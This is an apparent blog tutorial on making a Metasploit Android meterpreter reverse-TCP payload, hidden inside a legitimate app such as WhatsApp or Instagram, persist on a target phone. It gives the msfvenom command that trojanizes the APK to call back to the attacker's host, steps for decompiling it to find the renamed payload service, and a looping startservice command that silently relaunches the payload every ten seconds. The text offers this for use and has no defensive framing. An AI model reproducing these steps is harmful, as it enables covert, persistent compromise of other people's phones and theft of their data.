The persistent backdoor script .sh for the android/meterpreter/reverse_tcp non embedded apk payload was created and run by this post.
But the problem with this script is that you cannot use it on the payload which is embedded in the original apk file like Whatsapp or Instagram with: msfvenom -x original.apk -p android/meterpreter/reverse_tcp lhost=your_local_ip lport=1234 -o original_embedded.apk
In this post I will explain how to create a persistent backdoor script in this case.
The video explaining the same is uploaded on Youtube along with the link to a small software which I created which automates the whole script generation process. I made this software as I was getting tired of manually creating the scripts again and again, it is because each time the script is a little bit unique for each time the payload is created and not always the same as the do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity for default payload.
After downloading the script.py from the link, run the script in the terminal as: python script.py
Add the correct paths for apktool.jar and generated embedded_original.apk and click Generate Script.
That's it. It may take some time depending on the size of the apk file. The script will be saved as script.sh in the same folder where the python code script.py is located.
Run the script in meterpreter as shown in this post.
Please Note:- If you generate the script.sh in Windows platform instead of Kali then create a new script.sh file in Kali and copy & paste the script code in the newly created script.sh file. What I had experienced was that any script file created in Windows did not work in Kali msfconsole: exploit/multi/handler. Anyways if you are already using Kali then it is recommended to use this script generator software on Kali too to avoid confusion.
For doing it manually follow method 2 below
The steps to follow after the embed_original .apk creation.
Download and install Apktool by following the steps from this link.
Copy both apktool.jar & apktool in /usr/local/bin folder to use it in terminal.
The command for decompiling the the apk is: apktool d -f embed_original.apk
This will create an embed_original folder.
The embed_original folder will contain AndroidManifest.xml, open the file and traverse to the last part of the manifest file.
What we need is the last service as the reference for the script which looks like: <service android:exported="true" android:name="com.example.myapplication.apdie.Fiels"/>
This path: com.example.myapplication.apdie.Fiels will be used in the script to run the service. This path is usually com.metasploit.stage.MainActivity in the metasploit non-embed apk file.
But when the embed_original.apk is created, the files of the metasploit payload is moved in the original.apk with random file names such as "apdie.Fiels" in com.example.myapplication.apdie.Fiels which is basically "stage.Payload" in com.metasploit.stage.Payload to avoid conflicts with the names of the original apk files while running the application.
Use com.example.myapplication.apdie.Fiels as com.example.myapplication/.apdie.Fiels in script.sh.
do am startservice --user 0 com.example.myapplication/.apdie.Fiels
This will run the payload in the background at 10 second interval without opening the main application.
Remember that the apdie.Fiels will change every time when the payload is created so you have to repeat all the steps again if the embed_original.apk is generated again.
Follow the steps here to run the script.